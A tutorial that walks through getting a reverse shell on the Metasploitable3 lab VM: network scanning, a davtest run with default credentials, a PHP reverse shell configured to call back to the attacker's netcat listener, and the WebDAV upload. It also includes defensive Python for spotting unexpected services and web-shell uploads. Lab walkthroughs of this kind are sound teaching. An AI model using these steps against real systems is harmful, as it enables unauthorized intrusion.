DEV Community

ANDGOEDU

Reverse Shell on MetaSploitable3 Windows

In-Depth Steps for WebDAV Exploitation

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.

Information Gathering

Step 0: Check Your Kali Machine's IP Address and Subnet on eth0

ip addr

Example Results:

inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0

Step 1: Quick arp-scan

arp-scan 192.168.1.1/24

Example Results:

192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH

Step 2: Nmap Scan for All Ports and OS Detection

nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt

Example Results:

Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1

Also note the open port 8585 on 192.168.1.11, which hosts the WebDAV service:
PORT     STATE SERVICE REASON         VERSION
8585/tcp open  unknown syn-ack ttl 64

Nmap scan report for 192.168.1.11:

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:

Step 3: Davtest for WebDAV

davtest -auth admin:password -sendbd auto -url http://192.168.1.11:8585/uploads

Example Results:

Testing DAV connection
OPEN            SUCCEED:                http://192.168.1.11:8585/uploads
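The same arp-scan rows and nmap -vv "Discovered open port" lines are what a defender reads when looking for listeners that should not be there, such as WebDAV on 8585. The following Python is an added example, not code from the original post: it parses both formats and diffs the open ports against an approved-services baseline; the sample output and the baseline are constructed for this lab network.

```python
import re
from collections import defaultdict
# Constructed sample output in the formats shown above; not from a real scan.
ARP_SCAN_OUTPUT = """\
192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH
"""
NMAP_OUTPUT = """\
Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1
Discovered open port 8585/tcp on 192.168.1.11
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
ARP_RE = re.compile(rf"^({IP})\s+([0-9a-f]{{2}}(?::[0-9a-f]{{2}}){{5}})\s+(.*)$")
NMAP_RE = re.compile(rf"^Discovered open port (\d+)/(tcp|udp) on ({IP})$")

def parse_arp_scan(text):
    """Map IP -> (MAC, vendor) from arp-scan table rows; other lines are ignored."""
    hosts = {}
    for line in text.splitlines():
        m = ARP_RE.match(line.strip())
        if m:
            hosts[m.group(1)] = (m.group(2), m.group(3).strip())
    return hosts

def parse_nmap_ports(text):
    """Map IP -> set of 'port/proto' from nmap's 'Discovered open port' lines."""
    ports = defaultdict(set)
    for line in text.splitlines():
        m = NMAP_RE.match(line.strip())
        if m:
            ports[m.group(3)].add(f"{m.group(1)}/{m.group(2)}")
    return dict(ports)

def unexpected_services(ports, baseline):
    """Return {ip: sorted ports} that are open but absent from the approved baseline."""
    findings = {}
    for ip, open_ports in ports.items():
        extra = open_ports - baseline.get(ip, set())
        if extra:
            findings[ip] = sorted(extra, key=lambda p: int(p.split("/")[0]))
    return findings

# Hypothetical approved-services baseline for this lab network (an assumption, not from the post).
BASELINE = {"192.168.1.1": {"23/tcp"}, "192.168.1.3": {"2869/tcp"}}
if __name__ == "__main__":
    print(unexpected_services(parse_nmap_ports(NMAP_OUTPUT), BASELINE))
```

Run against the constructed output, 192.168.1.11 is reported with 7676/tcp and 8585/tcp as the only services not in the baseline.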

WebDAV Exploitation

Step 4: Copy PHP Reverse Shell to Desktop

cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop

Step 5: Edit PHP Reverse Shell

Edit /home/kali/Desktop/php-reverse-shell.php:

$ip = '192.168.1.10';  // Kali machine IP (the host running the listener)
$port = 7779;           // TCP port the Netcat listener from Step 6 is bound to
$shell = 'cmd.exe';     // Use cmd.exe for Windows

Step 6: Start Netcat Listener on Kali

nc -lvnp 7779

Step 7: Upload PHP Reverse Shell Using Cadaver

cadaver http://192.168.1.11:8585/uploads
dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php

Step 8: Check Netcat Listener for Shell

Return to the listener started in Step 6 (the command is repeated here for reference; do not start a second listener on the same port while the first is still running):

nc -lnvp 7779

Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.
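From the defender's side, this sequence leaves a recognizable footprint in the web server's access log: a davtest probe, a WebDAV PUT of a .php file into /uploads, then a request for that file. The Python below is an added example, not part of the original post; it flags that pattern over constructed Apache combined-format log lines, where the timestamps, user agents and davtest file names are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed Apache combined-format access log lines modelling the walkthrough:
# a davtest probe, the cadaver PUT of the PHP shell and the request that runs it.
# Timestamps, user agents and the davtest file names are assumptions.
ACCESS_LOG = """\
192.168.1.10 - - [10/Jan/2024:10:15:30 +0000] "OPTIONS /uploads HTTP/1.1" 200 - "-" "davtest"
192.168.1.10 - - [10/Jan/2024:10:15:31 +0000] "MKCOL /uploads/DavTestDir_x1y2 HTTP/1.1" 201 - "-" "davtest"
192.168.1.10 - - [10/Jan/2024:10:15:31 +0000] "PUT /uploads/DavTestDir_x1y2/davtest_x1y2.php HTTP/1.1" 201 - "-" "davtest"
192.168.1.10 - - [10/Jan/2024:10:16:02 +0000] "PUT /uploads/report.txt HTTP/1.1" 201 - "-" "cadaver/0.23.3"
192.168.1.10 - - [10/Jan/2024:10:16:05 +0000] "PUT /uploads/php-reverse-shell.php HTTP/1.1" 201 - "-" "cadaver/0.23.3"
192.168.1.10 - - [10/Jan/2024:10:16:40 +0000] "GET /uploads/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# client, timestamp, method, path, status from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".php3", ".phtml", ".asp", ".aspx", ".jsp", ".cgi")  # executed, not served

@dataclass
class Alert:
    severity: str
    client: str
    path: str
    reason: str

def detect_webdav_webshell(lines):
    """Return alerts for WebDAV writes of server-side scripts and their later execution."""
    alerts = []
    uploaded = set()  # script paths that a 2xx PUT has already written
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than abort the whole run
        client, _ts, method, path, status = m.groups()
        if not status.startswith("2"):
            continue  # only successful requests matter here
        name = path.rsplit("/", 1)[-1].lower()
        if method == "PUT" and name.endswith(SCRIPT_EXT):
            uploaded.add(path)
            alerts.append(Alert("high", client, path, "server-side script written via WebDAV PUT"))
        elif method in ("GET", "POST") and path in uploaded:
            alerts.append(Alert("critical", client, path, "uploaded script requested, likely executed"))
        elif method in ("PUT", "MKCOL") and "davtest" in name:
            alerts.append(Alert("medium", client, path, f"davtest-style probe ({method})"))
    return alerts

if __name__ == "__main__":
    for a in detect_webdav_webshell(ACCESS_LOG.splitlines()):
        print(f"[{a.severity}] {a.client} {a.path}: {a.reason}")
```

The same pattern is what server hardening should make impossible: require authentication for WebDAV write methods and configure the upload directory so that scripts stored there are served as static files rather than executed.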

Explanation:

  1. Information Gathering:

    • Step 0: Check the Kali machine's IP address on eth0 to identify the local network's subnet.
    • Step 1: Use arp-scan to discover active hosts on the network.
    • Step 2: Perform an Nmap scan to find open ports and detect the operating system.
  2. WebDAV Exploitation:

    • Step 3: Use davtest to verify that the WebDAV service is accessible.
    • Step 4: Copy a PHP reverse shell script to the attacker's machine.
    • Step 5: Edit the PHP script with the attacker's IP and desired port.
    • Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
    • Step 7: Upload the modified PHP script to the target using Cadaver.
    • Step 8: Check the Netcat listener for a successful reverse shell.

Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.
